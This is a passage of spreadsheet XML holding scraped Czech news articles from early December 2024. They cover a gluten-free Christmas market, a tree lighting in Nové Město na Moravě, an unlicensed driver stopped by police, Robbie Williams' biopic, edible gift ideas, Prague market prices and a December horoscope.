    <t>Shrnutí Vánoční bezlepkový trh 7. 12. 2024 vystavovatelé 1. 12. 2024 Nejen vánoční cukroví a čerstvé bezlepkové pečivo od českých pekařů na vás budou čekat v sobotu 7. prosince od 10 do 15 hodin ve výstavní hale č.4 v PVA EXPO Praha. Budete si moci nakoupit mouky na pečení cukroví a další bezlepkové produkty. A protože jsme součástí Stříbrných vánočních dnů zvládnete nakoupit třeba i dárky na blížící se Vánoce. Bude pro vás připraveno posezení a věříme, že hitem opět budou párky v rohlíku a další dobroty, které si budete moci zakoupit u stánku HM Globus. Pivovar Ferdinand bude opět točit alko i nealko pivo a limonádu.🙂 Kromě tradičních vystavovatelů se představí i řada bezlepkových „nováčků“. V nabídce budou i tipy na bezlepkové zájezdy. Někteří vystavovatelé opět nabízí možnost objednat si jejich výrobky předem a vy pak budete mít jistotu, že na vás zboží u stánků počká. Seznam vystavovatelů a objednávkové formuláře budou průběžně doplňovány. AMYLON, a.s. Amylon pro vás bude mít připravený stánek plný bezlepkových pudingů a voňavých pomocníků na pečení, kteří dodají vašemu svátečnímu cukroví ten správný šmrnc! Předobjednávky zde. BENKOR „Benkor pro vás bude mít připravený stánek plný voňavého koření, bylinek, lahodných bylinných karamelů a mnoho dalšího!🌿K dostání budou také nové směsi na grilování🔥“ Objednávkový formulář Benkor ZDE . BEZLEPKOVÉ ZÁJEZDY Láká vás vůně exotiky, lyžování na svazích Dolomit nebo letní dovolená u moře, ale řešíte bezlepkovou stravu? My se o vás postaráme! Vyřizujeme za vás bezlepková a jiná dietní přání přímo s hotely, zatímco cestujete s renomovanými cestovními kancelářemi. Těšíme se na Vás v Letňanech ! Nejen směsi a mouky bez lepku v BIO kvalitě z Velké Británie , ale i cereálie, cookies a těstoviny. BON BON Česká značka, převážně ruční výroba, špičkové zahraniční i české suroviny a vlastní receptury. Vyrábíme ručně tvarovanou čokoládu, čokoládové pralinky a speciality z nugátu a marcipánu. CELITA Firma ČOKO KLASIK družstvo a značka CELITA představí svůj kompletní bezlepkový sortiment. Letos se můžete těšit na ochutnávku dvojice tyčinek EXTASY. Proteinová Peanut Extasy a kokosová Coconut Extasy jsou tyčinky plné arašídového másla. Každý si oblíbí tu svou nejen díky poutavému vzhledu, ale hlavně díky skvělé chuti. Tuhle barevnou dvojku najdete na vybraných řetězcích i v maloobchodní síti prodejen. CUGU s.r.o. Srdečně zveme všechny návštěvníky k našemu stánku CUGU s.r.o. – touha ochutnat. Můžete se těšit na tradiční Stroopwafels,,tofíky,, a jiné potraviny bez lepku, laktózy, BIO s chutí a vůní z Nizozemí . Objednávkový formulář bude doplněn. Rýžové produkty – bez laktózy a lepku, pro všechny i pro vegany! HYPERMARKET GLOBUS Řeznictví Globus je jedinečné vlastní výrobou uzenin přímo v zázemí každého z hypermarketů Globus. Díky vlastní výrobě také dokážeme garantovat jejich širokou nabídku, vysokou kvalitu a bezlepkovost. Kromě chuťově oblíbených uzenin a paštik se mohou návštěvníci stánku těšit na kompletně bezlepkové bistro s nabídkou párků v rohlíku a také bude možno ochutnat novinku vegetariánské quiche – slané koláče. Nabídku ochutnávek a bistra tvoří uzenářské produkty z vlastního Řeznictví Globus a pekařské výrobky Free Days bez lepku. GLULU’S – EBONFARE Autor: Ivana Lášková Autor person Ivana Lášková Rubrika transition_slide Akce</t>
  </si>
  <si>
    <t>460</t>
  </si>
  <si>
    <t>739</t>
  </si>
  <si>
    <t>20241201_182_3475859074_5387397fd62c29eb996d.html</t>
  </si>
  <si>
    <t>5387397fd62c29eb996d</t>
  </si>
  <si>
    <t>Vánoční kouzlo v Novém Městě. Stromeček září, lidé zvonili na zvoničku štěstí</t>
  </si>
  <si>
    <t>Vánoční kouzlo v Novém Městě . Stromeček září, lidé zvonili na zvoničku štěstí Stejně jako ve Velkém Meziříčí , i v Novém Městě na Moravě rozsvítili na náměstí vánoční stromeček ještě před první adventní nedělí. A to v sobotu 30. listopadu. Okolo páté hodiny se již objevují hloučky lidí, dětí i dospělých, netrpělivě postávajících před malým vyvýšeným pódiem, hned před kašnou se sochou Vratislava z Pernštejna . Mezi lidmi prochází andělé s kasičkami a očekávání visící ve vzduchu doprovází zvuk cinkání zvonu v nedaleké zvoničce štěstí, na kterou si děti byly zazvonit pro splnění svých přání. A pod stromečkem, který bude hvězdou dnešního večera, se objevil slaměný vánoční betlém. Program začíná slavnostní fanfárou, kterou hrají studenti místní základní umělecké školy. I když zatím neuběhlo moc času od chvíle, kdy zapadlo slunce, je už po páté hodině tma jako v pytli. Od úst se vznáší obláčky a někteří přihlížející si mnou ruce, aby se zahřáli. Jiným k zahřátí dopomáhají teplé nápoje a občerstvení, které je možné zakoupit v pár stáncích po obvodu náměstí. Ten místního nadačního fondu, který nabízí svaření víno , nealkoholický punč nebo rolničky, je navíc spojený s dobrým poselstvím. Zakoupením lidé podpoří aktivity fondu, jenž letos pomohl například oblastem postiženým povodněmi. play_fill Žďársko „Na letošní rok jsme si připravili novinku. Protože jsme si v předchozích letech všimli, že když se stromeček rozsvítí, tak někteří lidé rozpačitě postávají a nevědí, co mají dělat,“ říká Petr Hladík , který večerem provázel. „Letos můžete stát taky a nemusíte být vůbec rozpačití, protože věřím, že ve stáncích zásoby teplého pití jen tak nedojdou. A v závěru dnešního večer bude ještě hrát nějakou chvíli reprodukovaná hudba,“ pokračuje a představuje adventní akce, na které se mohou lidé letos v Novém Městě těšit. Včetně například koncertu české hudební skupiny Zrní, který bude 13. prosince v evangelickém kostele. Vánoční skladby v podání žesťových nástrojů před slavnostním rozsvícením střídá sváteční slovo. Nejdříve se jej chopí starosta Michal Šmarda , společně s ním na pódium přichází i katolický kněz Miroslav Kulifaj a evangelický farář Ondřej Ruml . „Chtěl bych všem poděkovat za to, že ten dnešní den je tak krásný. On je tak krásný i proto, že v našem městě umíme pomáhat. A protože když si lidé pomáhají, tak není nikdy pozdě poděkovat,“ říká starosta a vyzdvihuje pomoc místních při stavbě domu pro seniory Pomněnka i podání pomocných rukou zatopeným obcím a partnerskému městu na Ukrajině . Volný čas „Advent, do kterého dnes večer vstupujeme, znamená příchod. Příchod světla, kterým je narozený Kristus, světla, které vítězí nad temnotou a prozařuje svět stejně, jak za malou chvíli prozáří vánoční strom toto náměstí,“ ujímá se slova Miroslav Kulifaj. „Nemusíme nikam jezdit, ani natahovat ruku ke hvězdám, abychom byli blízko tomu, oč opravdu o Vánocích jde,“ přebírá slovo Ondřej Ruml . Za chvilku je čtvrt na šest, do rozsvícení stromečku již zbývá jen pár okamžiků. Odpočtu vteřin do slavnostního rozsvícení se chopí starosta, který prosí již nedočkavé přihlížející o zachování ticha. A neodpočítává sám, přidávají se k němu i lidé v davu. „Teď!“ ozývá se náměstím a stromeček, na který se upírají všechny zraky, se rozzáří. Žlutá světýlka svítí nyní již také na kulatých stromcích, které lemují náměstí. Ve stejný okamžik začíná znít další fanfára. play_fill Volný čas Lidé se fotí se stromečkem, chodí si jej blíže prohlédnout, jejich kroky směřují ke zvoničce i stánkům s občerstvením. Jiní se trousí pomalu směrem z náměstí. Začíná znít i slibovaná reprodukovaná hudba. Okolo sedmé hodiny jsou už davy lidí pryč. Někteří se rozprchli do tepla svých domovů, jiní ještě zavítali do katolického kostela, který byl večer k příležitosti rozsvícení stromečku pro zájemce otevřený. Autor: Beata Dudová Autor person Beata Dudová</t>
  </si>
  <si>
    <t>20241201_183_3482516450_9cf3d4a9bf690436de69.html</t>
  </si>
  <si>
    <t>9cf3d4a9bf690436de69</t>
  </si>
  <si>
    <t>Muž za volantem začal před hlídkou městské policie zmatkovat. Nevlastnil řidičák</t>
  </si>
  <si>
    <t>Muž za volantem začal před hlídkou městské policie zmatkovat. Nevlastnil řidičák 01.12.2024 Zmatené couvání osobního vozidla v Klaricově ulici prozradilo v neděli odpoledne řidiče, který jím ve skutečnosti ani nebyl. Důvod jeho podivného chování se ukázal hned po zastavení hlídkou městské policie. Čtyřiatřicetiletý muž bez řidičáku skončil v rukou policistů. V neděli 1. prosince krátce před čtvrtou hodinou odpolední prováděla hlídka městské policie kontrolní činnost v Nádražní ulici. Strážníci náhle spatřili vozidlo vyjíždějící z Klaricovy ulice. Řidič tohoto vozidla však zjevně zazmatkoval a náhle začal před hlídkou městské policie couvat. Podezřelé chování řidiče poukazovalo na užití alkoholu nebo jiných návykových látek. To se sice nepotvrdilo, dotyčný však měl každopádně co skrývat. Jakmile ho totiž hlídka městské policie zastavila a vyzvala ho k předložení dokladů potřebných k řízení motorového vozidla, muž za volantem se svěřil, že vůbec není držitelem řidičského oprávnění. Strážníkům se poté snažil namluvit, že vozidlo neřídil, jeho tvrzení však vyvrátili tři jeho další spolujezdci. Celý případ si převzali k dalšímu šetření přivolaní policisté. Za přestupek podle zákona o provozu na pozemních komunikacích hrozí pachateli pokuta od 25 000 Kč do 75 000 Kč a zákaz činnosti po dobu od 18 měsíců do 3 let.</t>
  </si>
  <si>
    <t>20241201_184_3475816579_d637a8aac677f3cb027e.html</t>
  </si>
  <si>
    <t>d637a8aac677f3cb027e</t>
  </si>
  <si>
    <t>Temná minulost Robbieho Williamse : Promluvil o vynuceném potratu i boji s hvězdným kolegou Robbie Williams v novém životopisném filmu s názvem Better Man odkrývá těžké okamžiky své minulosti. Vzpomíná na bolestivý rozchod s Nicole Appletonovou, která byla donucena k potratu jejich dítěte pod tlakem nahrávací společnosti. Příběh zachycuje také napjaté vztahy s Liamem Gallagherem z kapely Oasis , jenž později vstoupil do života Nicole, píše deník The Sun. V roce 1998, když se Robbie Williams a Nicole Appletonová, tehdy členka populární skupiny All Saints , dozvěděli, že čekají dítě, byla to údajně pro zpěváka chvíle naděje a nového začátku. „Položil jsem ruku na její břicho a řekl jí: ‚To dítě mi zachraňuje život,‘“ vzpomíná podle deníku The Sun Williams. Jenže jejich štěstí netrvalo dlouho. Nicole, tehdy ve čtvrtém měsíci těhotenství, čelila obrovskému tlaku ze strany svého nahrávacího studia, které se obávalo dopadu mateřství na její kariéru. Nakonec se proto rozhodla pro potrat. „Byla donucena k potratu našeho dítěte. Je to drsné a bolestivé,“ přiznal Robbie . „Já jsem ji k tomu nenutil, ale byl jsem zatraceně špatný přítel. Navíc na vrcholu své závislosti a alkoholu ,“ dodal při premiéře svého biografického filmu Better Man. Tento moment patří dle jeho slov i k nejbolestivějším kapitolám jeho života: „Tohle je nejtěžší část filmu pro mě.“ Láska a pád ikonického páru Robbie a Nicole tvořili v 90. letech jeden z nejsledovanějších párů britské hudební scény. Seznámili se v roce 1997 na natáčení pořadu Top of the Pops a rychle se do sebe zamilovali. Robbie dokonce Nicole požádal o ruku po telefonu během turné. „Snažil jsem se přesvědčit sám sebe, že jsem připraven přijmout závazek, ale nebyl jsem,“ přiznal v dokumentu. Po potratu se vztah rychle rozpadl. Robbie , tehdy zápasící se závislostmi a tlakem slávy, nebyl schopen Nicole nabídnout potřebnou oporu. Nicole nakonec našla útěchu u Liama Gallaghera , tehdejšího frontmana kapely Oasis , se kterým v roce 2000 přivítali na svět syna Genea. Spor s Liamem Gallagherem Tento vztah ale přinesl do příběhu Robbieho a Nicole další drama. Napětí mezi zpěváky eskalovalo na Brit Awards v roce 2000, kde Robbie veřejně vyzval Liama k boxerskému souboji. „Uděláš to, nebo budeš srab?“ pronesl tehdy Robbie na pódiu, což vyvolalo na britské hudební scéně velký poprask. Nicole a Liam se nakonec v roce 2008 vzali, manželství však poznamenaly problémy a v roce 2013 skončilo po odhalení Liamovy nevěry. Dvacet let od katastrofy, která navždy změnila její život, se topmodelka Petra Němcová rozhodla znovu otevřít bolestné vzpomínky na 26. prosinec 2004, kdy při ničivém tsunami v Thajsku přišla o svého přítele a málem o vlastní život. O tom, jak se s tragédií vyrovnávala, mluvila s časopisem People. Film Better Man Nicole, kterou ve snímku ztvárnila herečka Raechelle Bannová, sama schválila scénář a podpořila premiéru. „Je neuvěřitelně statečná, že dovolila, aby byla tato část příběhu odvyprávěna,“ uvedl Williams na adresu své bývalé přítelkyně. Na červeném koberci se Nicole objevila v doprovodu své sestry a manžela Stephena Hainese. „To byl večer! Emocionální horská dráha,“ napsala na svém Instagramu . A post shared by Nicole Appleton (@nicoleappleton) Robbie v souvislosti s filmem mluví o naději na uzdravení a odpuštění. „Doufám, že toto bude uzdravující zkušenost pro mě i pro Nicole,“ řekl. Po více než 20 letech abstinence a se čtyřmi dětmi po boku Robbie říká, že našel smysl života a klid. „Díky mé manželce Ayde a dětem se každý den zlepšuji. Bez ní bych tady už nebyl,“ přiznal. Legendární britský zpěvák Elton John oznámil, že kvůli vážnému zhoršení zraku nedokončil své nové album ve spolupráci s dlouholetým textařem Berniem Taupinem . Fanoušci si na plánované vydání alba budou muset počkat, protože umělec aktuálně bojuje s následky těžké infekce. Přiznal to v pořadu Good Morning America na americké stanici ABC News. Film Better Man je nejen svědectvím o složitém životě jedné z největších hvězd britské hudební scény, ale také o odvaze otevřít se a čelit minulosti. „Na tuto noc jsem v životě nejpyšnější,“ řekl Robbie a vystoupení na premiéře zakončil písní My Way. Williams je mimochodem ve filmu vyobrazen také jako opice, což má symbolizovat jeho vnímání své vlastní kariéry. Tento vizuální prvek podle deníku Daily Mail odráží jeho pocit, že během své kariéry byl často vnímán jako cvičená opice, byl neustále pod tlakem a neměl kontrolu nad svým životem. redaktorka FTV Prima , CNN Prima NEWS Autor: Michaela Bartošová Autor person Michaela Bartošová</t>
  </si>
  <si>
    <t>20241201_185_3475847671_8f6ddb3fd8d42725d14d.html</t>
  </si>
  <si>
    <t>8f6ddb3fd8d42725d14d</t>
  </si>
  <si>
    <t>Letošní Vánoce ovládl jedlý trend. Miliony Čechů letos chtějí jen jeden dárek</t>
  </si>
  <si>
    <t>Letošní Vánoce ovládl jedlý trend. Miliony Čechů letos chtějí jen jeden dárek jedlé dárky, vánoce, vánoční dárky Mohou to být dárky na poslední chvíli, ale i dokonale vymazlené dobroty. Nejlépe se uplatní v úzkém rodinném kruhu nebo tam, kde přesně víte, že se svým výrobkem trefíte do černého. Lidé milují jedlé dárky. Je v nich totiž kus času, práce a péče toho, kdo vám dárek dal. A čím více milujete danou osobu, s o to větším potěšením se pak do dárečků zakousnete. Nebo si ho nalijete. Potřebujete rychlou inspiraci na různé typy dárků, protože vám snad všechno vypadlo z paměti? Nakládané speciality: sýry a uzeniny To jsou věci, které jako když najdete se silvestrovskými oslavami a můžete tak obdarovanému vytrhnout trn z paty, když mu s koncem roku přijde nečekaná návštěva. Utopenci, nakládané sýry s olivami, olejem nebo chilli. Zkusit můžete i kysanou zeleninu, takové kimči určitě nadchne. Přidejte k těmto dárečkům také kartičku s datumem, kdy bude dobrota nejchutnější! Mezi odvážnější tipy pak patří třeba domácí kombuchový nápoj. Sladce nakládané ořechy a sušenky I milovníky sladkého potěšíme, tradiční jsou různé ořechy, mandle nebo kešu nakládané do medu. Nebo domácí výroba pražených v cukru obalených oříšků. Do ozdobných sáčků s vlastnoručně vyrobenými cedulkami můžete ale nasypat i kupované pistácie či jiné ořechy, nebo namíchat ze sušeného ovoce a ořechů vlastní směs. Domácí sušenky nadchnou, zejména, jde-li o nějaký osvědčený nebo i prvně vyzkoušený recept. Prostě aby to mělo punc jedinečnosti. Jednodušší variantou jsou i domácí granoly, do kterých se perfektně hodí zbytky oříšků, sušeného a proslazeného ovoce z vánočního pečení. Tradicí jsou pečené čaje, nebo dokonce, je na to sezóna: což takhle v rámci vůně Vánoc zkusit poprvé v životě pomerančový džem? Likéry jako oblíbený vánoční dárek Zdroj Shutterstock Likéry a alkohol Vaječné likéry jsou v různých variantách a tabu nemusí být ani pro ty, kteří si hlídají linii. Receptů na fittnes vaječáky najdete hromadu, nejzajímavěji se jeví návody s kokosovým mlékem nebo likéry bez alkoholu . A pak už můžete experimentovat i s příchutěmi, kakakový, karamelový, kávový, kokosový … malá sada různých příchutí by byla skvělý dárek! Kouzlit můžeme i s čistým alkoholem , když nalijete kvalitní čirý alkohol do ozdobných lahví, přidáte například semínka z granátových jablíček, vznikne růžový nápoj. Naložit do alkoholu můžeme i zázvor. Likéry můžete dosladit svařeným cukrem nebo karamelem. Domácí paštiky Rillettes, domácí paštiky, třeba s přídavkem whiskey, nebo různá chutney, zavařované pomazánky na topinky, to už jsou dárečky, u kterých míříte přesně a víte, že dotyčný je miluje. Za ten pocit, kolik času jste nad vařením strávili, to rozhodně stojí. Jedlé dárky jsou nejoblíbenější Zdroj Shutterstock Domácí pralinky i nutella Stačí mít formičky, stačí i silikonové na led, a můžete to zkusit. Formičku vytřete vrstvou kvalitní rozehřáté čokolády a až zaschne, naplňte formu sladkou máslovou nebo jinou náplní. Uzavřete další vrstvou čokolády a nechte ztuhnout. Experimentovat můžete s různými náplněmi. Internet se také hemží recepty na domácí nutelly, ořechová másla, takže máte-li kvalitní mixér, můžete se do nich zkusit pustit. Perfektním tipem je také doma vařený slaný karamel. Zdroj: apetitonline.cz, prozeny.cz, prozeny.cz II Čokoláda jako vánoční dárek.: Shutterstock Foto: Autor: Renata Petříčková Autor person Renata Petříčková</t>
  </si>
  <si>
    <t>20241201_186_3475930929_2d007967291befc9506c.html</t>
  </si>
  <si>
    <t>2d007967291befc9506c</t>
  </si>
  <si>
    <t>Langoš i za 220. Za kolik se na trzích na Staromáku najíte a napijete Vánoční trhy před Týnským chrámem potrvají až do 6. ledna a otevřené jsou denně od 10 do 22 hodin. Pro ty, kdo chtějí zažít pravé kouzlo vánoční atmosféry, jsou ideální večerní hodiny, kdy náměstí rozzáří světla a vánoční výzdoba. I v tomto roce si za oblíbené vánoční pochoutky na Staroměstském náměstí budete muset připlatit. Malý svařák (0,2 l) vás vyjde na 100 Kč, stejně jako klasický trdelník. Pivo ( Plzeň 0,4 l) stojí 80 Kč. Zdražení se nevyhnulo ani dalším výrobkům. Vánoční trhy na Staroměstském náměstí . | Video: Deník/Anna Bušková „Medovina zůstala stejně drahá jako loni, punč se ale trochu prodražil,“ uvedla jedna ze stánkařek. „Ceny jsme letos zvedali asi o 10 až 20 korun, hlavně u piva , svařáku a pečené kukuřice,“ přidává paní u stánku s občerstvením. „Letos mi přijdou trhy zase o trochu dražší než předchozí rok. Myslím si, že je to přirozené, kvůli inflaci,“ dodal prodejce vánočních ozdob. Ozdoby na vánoční strom se pohybují zhruba od 80 do 150 za kus. Pokud si zde chcete pořídit domů i jmelí, vyjde vás jeden svazek na 70 korun. Jak moc jsou ceny stánkařů na Staroměstském náměstí ovlivněny také nájmem se veřejnost nedozví. „Tato informace není veřejná,“ uvedla Hana Tietze, mluvčí organizátora trhů Taiko, a.s.. I bez této informace však zájem o provozování stánků přetrvává. Zdražení však většinu návštěvníků neodradilo. Sobotní slavnostní rozsvícení vánočního stromu na Staroměstském náměstí bylo skutečným vrcholem dne. Podle informací iDNES přilákalo rozsvícení desetitisíce lidí, kteří zaplnili náměstí do posledního místa. Vánoční trhy na Staroměstském náměstí . | Video: Deník/Anna Bušková Z důvodu bezpečnosti musela policie na dvě hodiny uzavřít vstup na náměstí, přičemž pro auta byla po celou dobu uzavřena i Pařížská ulice. Pořádek na místě hlídalo téměř sto policistů a celá akce proběhla klidně. Ať už hledáte originální vánoční dárek, chcete ochutnat adventní speciality, nebo si jen užít pohled na rozsvícený strom a nasát vánoční atmosféru, Staroměstské vánoční trhy zaručeně nezklamou. Vánoční trhy na Staroměstském náměstí jsou otevřené. Kolik letos stojí svařák, trdelník nebo pivo ? Podívejte se na přehled cen a další zajímavosti. Pivo Plzeň (0,4 l) 80 Kč Nealko Malinovka (0,4l) 70 Kč Kola (0,4l) 70 Kč Mattoni (0,75l) 70 Kč Teplé nápoje Espresso 70 Kč Cappuccino 90 Kč Čaj 70 Kč Horká čokoláda 90 Kč Svařák (0,2l) 100 Kč Horké jablko (0,2l) 70 Kč Horké lesní ovoce (0,2l) 70 Kč Punč 90 Kč Medovina (0,2l) 130 Kč Dekorace Jmelí 70 Kč Ozdoba anděla na vánoční strom 150 Kč Baňka na vánoční strom 80 až 120 Kč Jídlo Klobása v bagetě 150 Kč Klasický trdelník 100 Kč Langoš 180 až 220 Kč Dýňová polévka 155 Kč Pečené kaštany 140 Kč ¼ grilovaného kuřete 150 Kč Burger 299 Kč Ovocný knedlík 99 Kč Balíček perníčků 150 Kč Bramborové spirálky 100 až 150 Kč Párek v těstíčku 150 Kč Vafle 130 až 150 Kč Kukuřice 80 Kč Autor: Anna Bušková Autor person Anna Bušková Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>730680</t>
  </si>
  <si>
    <t>750500</t>
  </si>
  <si>
    <t>20241201_187_3475797732_f18b8d050b1845599043.html</t>
  </si>
  <si>
    <t>f18b8d050b1845599043</t>
  </si>
  <si>
    <t>Martina Blažena Boháčová: Co čeká jednotlivá znamení v prosinci 2024</t>
  </si>
  <si>
    <t>Martina Blažena Boháčová: Co čeká jednotlivá znamení v prosinci 2024 466 Astroložka a spisovatelka Martina Blažena Boháčová. Foto: z archivu autorky Beran Končí rok 2024. Hned první den v prosinci proběhne novoluní ve znamení Střelce. Dne 1. 12. 2024, na novoluní ve Střelci, by si mohli Berani vytyčit nový cíl. I když je to neděle, měli by být Berani aktivní. Berani, chodíte na procházky? Hýbete se? Věnujete dostatečnou pozornost svým končetinám? Možná vám nestačí chodit po zemi, třeba chcete létat nebo se vznášet, uvolnit se z nějakého sevření. Klidně přemýšlejte o cestě, třeba do ciziny, anebo na nějaké magické a krásné místo, na kterém byste se mohli věnovat svým myšlenkám a pochopit to, co se vám děje. Některým Beranům se může zdát, že se život nevyvíjí podle jejich představ. Že by si takovou cestu nikdy nevybrali. A jiní Berani zase touží po větším klidu a po naplnění svých snů. Je to už mnoho měsíců, co Jupiter v Rybách mění beranní mentalitu. Z některých divočáků se stávají klidnější jedinci. Z jiných Beranů se stávají psychologové a terapeuti duše. Kdo se věnuje duchovní cestě, zažívá neuvěřitelný rozvoj. Prosinec bude přát hlavně vzdělaným Beranům, těm, kteří se chtějí učit, ale také těm, kteří chtějí psát a debatovat v nějakých skupinách o světě. Berani se mají v tomto období obklopit lidmi vzdělanými. A protože Mars se stále pohybuje znamením Lva, mohou Berani někoho začít obdivovat. Mars příjemně ovlivňuje partnerské vztahy Beranů a také vztahy k dětem a k mládeži. Berani, kteří už mají dítě velké, mohou pracovat na nějakém kreativním projektu, ke kterému se budou chovat jako k dítěti. Je čas na reklamu. Je čas zdokonalovat se v práci na sociálních sítích a komunikovat s celým světem. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Luna udělá konjunkci s Jupiterem. Jupiter je v Blížencích už několik měsíců, a ještě se tam zdrží. Pro Berany je to hodně o komunikaci. Přichází náročné období na vyřizování papírů, řešení na úřadech. Výborné období na reklamu a prosazení sebe sama. Můžete potkat mnoho zajímavých lidí. Berani, kteří něco píšou, přednášejí nebo pracují ve vzdělávání, dostanou nové příležitosti. Je prosinec, blíží se Vánoce. Dne 21. 12. 2024 začíná zima. Rok se blíží k závěru a pomohl Beranům získat větší stabilitu. Dosáhnout lepší práce. A zmoudřet. Je potřeba si připomenout, že Saturn v Rybách otevírá v Beranech nejen vnitřní proměnu, ale také proměnu vnějšího okolí. Berani, jestliže jste zvládli umění komunikace, umění se prosadit, jestliže jste se neustále vzdělávali, budoucnost je vaše. Dne 30. 12. 24 proběhne nov v Kozorohu. Berani! Úspěch! Hurá! Krásné Vánoce, hodně štěstí do nového roku. Býk Prosinec bude pro Býky ekonomicky zajímavý měsíc. Hned 1. 12. 2024 proběhne novoluní ve Střelci, které má na starosti cestování, pohyb, přesun a vzdělávání. Uran v Býku dělá trigon na Venuši. Býci mohou upevnit svou pozici. Mohou do něčeho investovat nebo něco prodat. V prosinci se u některých Býků vyřeší majetkové záležitosti. Všichni Býci by si měli udělat jasno v tom, jak to mají s majetkem, který sdílejí s někým jiným. Býci, dejte si do pořádku vše v bankách. Zkontrolujte si pojistky, můžete taky uzavřít pojištění nové. Některým Býkům přijdou peníze. Někteří dostanou geniální nápad, který peníze přinese v budoucnu. Dne 15. 12. 2024 proběhne úplněk v Blížencích. Ten má na starosti důležité zprávy, nové informace, komunikaci, psaní a také internet. Býci, Venuše udělá opozici na Mars. Hlídejte si atmosféru doma. Je prosinec, blíží se Vánoce, a tak se snažte, aby celá rodina byla v pohodě. Rodina je důležitá, a také spokojený domov je důležitý. Svůj domov si ochraňujte a Vánoce si užijte. Kupujte jen takové dárky, na které máte. Vy jste Býci a moc dobře víte, že peníze se lehce půjčují, ale hůře se vrací. Venuše je ve Vodnáři, a to chce nové zážitky. Býci, vyrazte s rodinou na hory nebo si udělejte dovolenou plnou krásných zážitků. V prosinci proběhne další novoluní dne 30. 12. 2024. Venuše udělá kvadraturu na Uran v Býku. Buďte na sebe opatrní a silvestrovské oslavy nepřehánějte. Raději se vyhněte pyrotechnice a situacím, kde jsou lidé, kteří nad sebou nemají kontrolu. Krásně si to užijte a připravte se na další rok, ve kterém vás čeká mnoho dalších a důležitých úkolů. A jaké to budou? Napoví vám kniha HOROSKOPY NA ROK 2025. Blíženci Máme tady poslední měsíc v roce. Prosinec bude velmi důležitý na události. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. Také Merkur je ve Střelci, a to znamená, že váš mozek jede naplno. Jste napojeni na celý svět, jste napojeni na věci mezi nebem a zemí. Boříte hranice, využíváte svět internetu, využíváte svět mobilů, komunikujete a vaše slova mají obrovský význam. Milí Blíženci, Saturn se po celý rok 2024 nachází v Rybách. Působil na vás jako učitel, který má zájem vás toho hodně naučit, předat vám nové zkušenosti a vložit do vás větší sebedůvěru. Jestli se mu to povedlo, zvedli jste si životní laťku. Zvedli jste svou životní a společenskou prestiž. Saturn vás učí, jak se stát větší autoritou. Učí vás, jak umět zacházet s egem ostatních lidí. V prosinci si ujasníte, na jaké podmínky jste schopni přistoupit. Jestli budete něco podepisovat, řádně si vše přečtěte a nechte si poradit. V partnerských vztazích si udělejte na partnera čas. Je to fajn a je to logické, v prosinci jsou Vánoce, tedy rodinné svátky. Partner, děti, rodiče. Buďte spolu a mějte se rádi, dokud máte jeden druhého. Dne 15. 12. 2024 proběhne úplněk v Blížencích. Je to nejdůležitější úplněk v roce. Blíženci, připomenu vám, že se v Blížencích nachází také Jupiter a že vám do života přináší energie úspěchu. Luna a Jupiter spolu udělají konjunkci. Silné emoce a silné napojení. Jestli nová šance nepřijde hned v prosinci, čekejte ji v první polovině příštího roku. Je ale potřeba si uvědomit, že vždy, když probíhá úplněk ve vašem znamení, uzavírá se nějaká životní oblast. A to ta, která už k vám nepatří. Propusťte vše staré a otevřete se novým možnostem. Dne 21. 12. 2024 nastává zimní slunovrat. Slunce se přesune do Kozoroha a začíná zima. Od tohoto okamžiku se opět začnou prodlužovat dny. A vám začíná svítat na ještě lepší časy. Druhé novoluní proběhne 30. 12. 2024 a bude ve znamení Kozoroha. Má vliv na váš majetek, vaše vlastnictví, vaše investice. To jsou témata, která začnete řešit hned od začátku příštího roku. Krásné Vánoce, bohatého ježíška, příjemné oslavy. Těším se s Vámi u mé knihy HOROSKOPY NA ROK 2025. Rak A je tady závěr roku 2024. Raci na sobě udělali kus práce. Jejich vnitřní proměna ale ještě není u konce. Změnilo se jejich myšlení, změnili své názory, snažili se vzdělávat a vyhledávali do svého života kvalitní a vzdělané lidi. Tento trend u nich vyvolává Saturn v Rybách, který se bude v této pozici nacházet i příští rok, takže mentální proměna bude pokračovat. Hned na začátku prosince by měli Raci posílit svůj imunitní systém a hlídat si zdraví. Důležitý je nejen fyzický zdravotní stav, ale také ten psychický. Psychiku Raci posílí tím, že budou meditovat, budou v klidu, využijí léčivých účinků vody, budou hýčkat své tělo a také svou mysl. Někteří Raci budou pozorovat změny v pracovním kolektivu. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce, které má na starosti přesuny, změny místa, cestování, ale také touhu po pohybu. Pohyb léčí, a to Raci vědí. Jupiter se nachází ve znamení Blíženců a bude tam do června příštího roku. Toto postavení nutí Raky přemýšlet a hodnotit svůj život. Raci si mají uvědomit, co a koho již ve svém životě nepotřebují. Mají se naučit rozloučit se s nefungující minulostí. Dne 15. 12. 2024 proběhne úplněk v Blížencích. Raci jsou citliví a může je rozrušit nějaká zpráva. Raci, nenechte si zkazit náladu od pomlouvačného člověka. Vy jste jedineční. Snažte se myslet pozitivně, neurážejte se usmívejte se. A co takhle vyrazit někam do přírody? Nebo navštívit krásná místa? Dne 21. 12. 2024 začíná zima a od tohoto okamžiku se začne prodlužovat den. Raci, leze vám na nervy, že je pořád tma? To se začne měnit. V prosinci proběhne ještě jednou novoluní, ale to bude až na konci roku. Dne 30. 12. 2024 proběhne novoluní ve znamení Kozoroha. To má na starosti ambice, pracovní růst, vztahy na pracovišti, podmínky, za kterých fungujete. Toto se ale projeví naplno až v lednu 2025. V prosinci se věnujte rodině, oslavte Vánoce, jezte, pijte, hodujte a dívejte se na pohádky. A až si budete připíjet na Silvestra, uvědomte si, co všechno máte. A možná je čas poděkovat. Hodně štěstí a v příštím roce se s vámi těším u mé další knihy HOROSKOPY NA ROK 2025. Lev Poslední měsíc v roce bude bohatý na události. Akci bude střídat akci. Někteří Lvi budou přemýšlet, co se to vlastně děje? Proč pořád něco musí? Je to tím, že se ve znamení Lva nachází Mars. Mars je planeta aktivity, boje o svá práva a o svůj postoj. Pod vlivem Marsu se člověk nezastaví. Hned první den v prosinci bude silný a otevře období, ve kterém se budou řešit vztahy s partnerem a s dětmi. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. Lvi, blíží se Vánoce. Věnujte se rodině. Dárky jsou fajn, ale víte, co potěší? Společně strávený čas. Co takhle výlet na hory? Nebo někam do tepla? Prostě něco vymyslete. Láska je kolem vás, a tak ji přijímejte, ale také rozdávejte. V prosinci vás čeká hodně společenských aktivit. Měli byste jít všude tam, kam 